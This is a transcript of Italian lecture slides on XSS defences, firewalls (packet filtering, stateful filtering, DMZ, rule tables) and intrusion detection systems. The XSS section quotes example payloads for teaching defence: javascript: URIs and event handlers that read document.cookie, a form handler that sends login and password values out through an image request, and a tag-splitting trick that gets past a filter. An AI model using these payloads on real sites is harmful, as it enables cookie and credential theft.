Elementi di Sicurezza e Privatezza Lezione 15 Firewall and IDS. Chiara Braghin

Transcript

1 Elementi di Sicurezza e Privatezza Lezione 15 Firewall and IDS Chiara Braghin

2 XSS: difese a lato server

3 Come proteggersi? Assicurarsi che l applicazione verifichi tutti gli header, cookie, query, campi dei form (anche quelli hidden!) tenendo a mente cosa è permesso e cosa non lo è Conviene avere una politica che specifica COSA È PERMESSO, e non cosa sia negato. 2

4 Validazione dell input Mai fidarsi dei dati provenienti dal client Rimuovere/codificare i caratteri speciali Verificare la presenza di alcuni tag 3

5 Filtrare l output Rimuovere/cifrare i caratteri speciali (X)HTML < per <, > per >, &quot per Permettere solo comandi safe (e.g., no <script> ) Attenzione 1: Controllare trucchi anti-filtro Quoting malformato: <IMG ><SCRIPT>alert( XSS ) Attenzione 2: Gli script non si trovano solo dentro <script>! 4

6 Scripts non solo in <script>! JavaScript as scheme in URI <img src= javascript:alert(document.cookie); > JavaScript On{event} attributes (handlers) OnSubmit, OnError, OnLoad, Typical use: <img src= none OnError= alert(document.cookie) > <iframe src=` onload=`steal()`> <form> action="logon.jsp" method="post" onsubmit="hackimg=new Image; hackimg.src=' +document.for ms(1).login.value'+':'+ document.forms(1).password.value;" </form> 5

7 Problemi con i filtri Si supponga che un filtro rimuova <script Caso OK: <script src=... src=... Però <scr<scriptipt src=... <script src=... 6

8 XSS: difese a lato client

9 Come difendersi? Proxy-based Analizzare il traffico HTTP scambiato tra il browser e il Web server cercando (e rimuovendo o codificando) caratteri speciali Application-level firewall Analizzare le pagine HTML cercando dei link che possono rilasciare informazioni sensibili Blocccare richieste cattive Auditing system Monitorare l esecuzione di codice JavaScript e confrontarle con una politica ad alto livello 8

10 Outline di oggi Vi ricordate le 3 parole chiave per garantire un sistema sicuro? Prevenzione Rilevamento Reazione Oggi: Firewall: prevenzione tramite protezione perimetrale Intrusion detection system (IDS): rilevamento 9

11 Firewall

12 Firewall Sistema di controllo degli accessi che verifica tutto il traffico in transito Consente o nega il passaggio del traffico basandosi su una politica di sicurezza Funzioni: verifica pacchetti in transito blocca pacchetti non autorizzati e/o pericolosi maschera indirizzi interni (classi di indirizzi IP riservate e non instradabili ) (NAT, Network Address Translation) 11

13 Firewall: scenario di base Separa la LAN dal resto della rete Tutti i pacchetti tra la LAN e il resto della rete vengono instradati attraverso il firewall Firewall Local network Internet Router 12

14 Firewall: DMZ (1) DMZ: De-Militarized Zone Una o più sottoreti accessibili con connessioni dall'esterno (e dallʼinterno) della rete ma filtrati dal firewall Gli host della DMZ non possono connettersi alla rete interna Contiene i server che devono essere accessibili dallʼesterno e/o dalla rete interna server server DNS server Web 13

15 Firewall: DMZ (2) 14

16 Firewall: politiche di sicurezza (1) Il firewall applica delle regole per stabilire se far passare o meno i pacchetti è utile solo quando le regole vengono configurate in modo appropriato Per tutte le sottoreti protette da un firewall si possono definire diverse politiche di accesso realizza una separazione in zone aventi diverso grado di sicurezza nellʼarchitettura di rete 15

17 Firewall: politiche di sicurezza (2) Serve una specifica ad alto livello della politica di sicurezza default deny: tutto viene bloccato tranne quello che è autorizzato (politica chiusa) default allow: tutto viene permesso tranne quello che non è autorizzato (politica aperta) 16

18 Tipi di Firewall Network layer Packet filtering Stateful packet filtering Application layer Circuit level Application proxy 17

19 Packet filter (1) Filtra i pacchetti solo sulla base delle informazioni nellʼheader del pacchetto TCP i valori dei campi degli header dei pacchetti vengono confrontati con le regole della politica e ammessi o scartati a seconda del risultato del confronto Header indirizzo sorgente indirizzo destinazione porta sorgente porta destinazione tipo di protocollo opzioni di protocollo 18

20 Packet filter (2) Non si può tracciare la correlazione tra pacchetti in una trasmissione Ogni pacchetto viene esaminato singolarmente, indipendentemente dai pacchetti precedenti e da quelli successivi Non si possono esaminare problemi a livello (OSI) più alto 19

21 Regole di filtraggio (1) Indirizzi IP usati per chiudere/aprire il traffico da determinate sorgenti a determinate destinazioni Numeri di porta usati per bloccare/permettere servizi noti (porta 80?) Bloccare un protocollo Combinazioni dei precedenti 20

22 Regole di filtraggio (2) Esempi di regole: Se un pacchetto arriva sullʼinterfaccia esterna del firewall ed ha un mittente della rete interna lo si blocca Verifica di spoofing (falsificazione dellʼidentità) Se un pacchetto arriva dallʼesterno e fa parte di una connessione ftp non accettarlo Accettare solo connessioni sicure (SFTP - SSH File Transfer Protocol, o FTPS - FTP over SSL) 21

23 Regole di filtraggio (3) Come vengono valutate le regole? Le regole di filtraggio memorizzate in uno specifico ordine Viene utilizzata la prima regola incontrata con la quale cʼè corrispondenza Se una regola blocca la trasmissione o ricezione del pacchetto, il pacchetto è rifiutato Se una regola permette la trasmissione o ricezione di un pacchetto, il pacchetto è permesso Se il pacchetto non soddisfa nessuna regola si applica la regola di default (deny all o allow all) 22

24 Regole di filtraggio (4) Di solito vengono definite tramite la seguente tabella (variante standard CISCO): Direzione IP sorgente IP destinazione Protocollo Porta sorgente Porta destinazione Flag ACK Azione Flag ACK: se il protocollo è TCP, il suo valore può essere 0, 1 o 0/1; ** per altri protocolli In una connessione TCP: Server port: < 1024 Client port: tra 1024 e

25 Politica di sicurezza: esempio (1) Permettere la connessione tra i client in rete = ed il servizio SMTP (tcp/25) di qualsiasi host esterno Possibile tabella: Direzione IP sorgente IP destinazione Protocollo Porta sorgente Porta destinazione Flag ACK Azione OUT rete ANY TCP >= ANY permit IN ANY rete TCP 25 >= permit 24

26 Politica di sicurezza: esempio (2) Problemi: Non cʼè modo di garantire che il ritorno del pacchetto di conferma (TCP ACK) venga dalla stessa connessione Porte nel range [1024, 16383] disponibili per i client per ricevere le risposte, ma: potrebbe essere la risposta legittima di un server ad una connessione stabilita precedentemente potrebbe essere traffico illecito Politica troppo lasca! 25

27 Stateful (dynamic) packet filtering (1) Simile al packet filter ma state-aware Distingue le nuove connessioni da quelle già aperte tabelle di stato per le connessioni aperte ogni pacchetto viene esaminato sia singolarmente che in relazione ai pacchetti precedentemente ricevuti e appartenenti alla stessa sessione Prestazioni migliori rispetto a packet filter 26

28 Stateful (dynamic) packet filtering (2) 27

29 Firewall: architettura Software su processori general purpose sistema più economico e flessibile Software su processori GP (Gigahertz processor) Hardware dedicato (router) soluzione più costosa e spesso basata su software proprietario 28

30 Firewall: limiti Controlla tutto e solo il traffico che lo attraversa intrusioni interne non sono individuate Se le connessioni arrivano attraverso un percorso non controllato, il firewall non serve utente connesso via modem Non controllano file infetti da virus 29

31 Intrusion Detection Systems

32 Audit di sicurezza Audit = attività atte a misurare la conformità di determinati processi, strutture o procedure a determinate caratteristiche richieste Usato in due diverse accezioni: Analisi delle procedure e delle pratiche adottate per valutare le eventuali vulnerabilità Analisi degli eventi per determinare violazioni alla sicurezza o tentativi di violazioni 31

33 Aree di intervento Sicurezza organizzativa verifica delle responsabilità politiche aziendali Sicurezza logica e fisica valutazione protezione da accessi non autorizzati valutazione protezione da eventi di natura umana o ambientale (es., dispositivi antincendio, backup) valutazione protezione dellʼinfrastruttura di rete valutazione protezione di server e client Sicurezza delle applicazioni verifica protezione dei sistemi applicativi rispetto alle tipologie di rischio intrinseco e implementativo 32

34 Analisi dei rischi Identificazione e valutazione dei rischi che si verifichi un certo evento Meccanismi per tenere i rischi sotto controllo Valutazione della probabilità che accada un rishio Valutazione dellʼimpatto di ciascun rischio Determinazione di contromisure Sviluppo e utilizzo di misure per mitigare gli effetti di un rischio Determinazione della gravità di un rischio e scelta delle contromisure appropriate 33

35 Tool per lʼanalisi automatica Riducono la quantità di dati che devono essere analizzati manualmente Sistemi per la determinazione di intrusioni (intrusion detection system) Acquisizione e analisi svolti in contemporanea 34

36 Intrusion detection system (IDS) - 1 Gli IDS sono sistemi di monitoraggio rilevano attacchi generano allarmi, non prevengono intrusioni Fasi di un IDS: 1. Raccolta dati 2. Analisi 3. Risposta 35

37 Intrusion detection system (IDS) - 2 Idee di base: 1. Chi entra in un sistema abusivamente compie operazioni che un utente normale non fa 2. Gli attacchi spesso sono associati ad una violazione del controllo dellʼaccesso buffer overflow utente esterno ottiene accesso a risorse protette programma e/o file modificati 36

38 IDS: requisiti Deve poter essere eseguito senza la supervisione degli utenti Non deve essere una scatola nera il suo comportamento interno dovrebbe essere analizzabile dallʼesterno Deve essere resistente ai guasti Deve essere resistente ad attacchi Deve richiedere un basso overhead Deve essere facilmente adattabile al sistema in osservazione Deve far fronte a cambiamenti nel comportamento del sistema 37

39 IDS: classificazione (1) Due tecniche di analisi dei dati: Anomaly detection: segnala eventuali (e significative) deviazioni dal modello normale di comportamento Misuse detection: segnala lʼeventuale comparsa di eventi che rispecchiano schemi predefiniti di attacchi Richiede una conoscenza a priori dei possibili attacchi 38

40 IDS: classificazione (2) Utilizza dati differenti: HIDS (Host-based Intrusion Detection System): dati relative allʼattivita locale di un singolo computer (log di sistema, accesso a file critici, ecc, ) visibilità migliore dei comportamenti di una applicazione in esecuzione sulla macchina NIDS (Network-based Intrusion Detection System): controlla il traffico di rete Un singolo NIDS può proteggere diverse macchine 39

41 Anomaly detection Basati sulla definizione di profili dʼuso che descrivono il normale funzionamento costruiti manualmente (difficile!) attraverso tecniche di machine learning e data mining Anomalie: deviazioni dai profili deviazione rispetto dati statistici Capace di riconoscere nuovi attacchi 40

42 Anomaly detection: profili Definiti in base a determinate caratteristiche (metriche) che vengono monitorate dal sistema Attività di login e sessione frequenza login ultimo login tentativi di specifica password falliti Esecuzione di programmi e comandi frequenza di esecuzione risorse di CPU e I/O usate Attività di accesso a file frequenza di read/write/create/delete numero record letti/scritti numero letture/scritture/cancellazioni/creazioni falliti 41

43 Esempio: sequenze di sys call Costruisce delle tracce durante la normale esecuzione del programma Comportamento di esempio (sys calls) open read write open mmap write fchmod close Alcune tracce vengono memorizzate (lung = 4) open read write open read write open mmap write open mmap write open mmap write fchmod mmap write fchmod close Riporta un anomalia se la sequenza seguente viene osservata: open read read open mmap write fchmod close 42

44 Anomaly detection: problemi Scelta delle metriche (cosa misurare) Scelta dei modelli di base: cosa succede se lʼattacco compare solo in variabili che non sono state modellate? Segnalazione di tipo statistico che va interpretata da un esperto umano Scelta dei threshold (soglia di allarme) 43

45 Misuse detection Si basa sulla descrizione dei tipi di attacco (caratteristiche invarianti di attacchi noti) Riconosce solo attacchi per cui esiste una descrizione (signature) Usa un modello di regole per descrivere gli attacchi Pro: Genera segnalazioni precise Contro: Riconosce solo attacchi noti 44

46 Misuse detection: problemi Necessità di gestire un repository degli attacchi Problemi di aggiornamento (solo gli attacchi conosciuti vengono segnalati) Problema di generazione delle signature degli attacchi 45

47 Host-based IDS HIDS è in grado di monitorare attività a livello di singolo utente Vantaggi: Scopre la presenza di rootkit Svantaggi: necessario un IDS per ogni macchina se un attaccante ottiene il controllo della macchina può modificare IDS e lʼaudit log solo visione locale di un attacco Esempi di HIDS: Tripwire (controlla integrità file) 46

48 Network-based IDS Ispezionano traffico di rete Cerca violazioni a protocolli pattern di connessioni inusuali stringhe di attacco nei payload dei pacchetti Svantaggi: non sono in grado di ispezionare traffico crittato non tutti gli attacchi arrivano dalla rete memorizzza ed elabora una grande quantità di traffico Esempi di NIDS Snort, Bro 47

49 Falsi positivi e falsi negativi Falsi positivi: Allarmi provocati da eventi legittimi le politiche di sicurezza in realtà non vengono violate causa interruzioni non necessarie causa insoddisfazioni negli utenti Falsi negativi: Allarmi mancati in presenza di eventi illegittimi le politiche di sicurezza sono violate intrusione non rilevata evento illegittimo interpretato come legittimo 48

50 IDS: problemi Mancanza di dati interessanti Molti network normali, system call data Pochi dati su attacchi realistici, anomalie Difficile scegliere il valore soglia Alcuni attacchi possono rientrare nei limiti di attività normali Falsi positivi/negativi sono molto costosi 49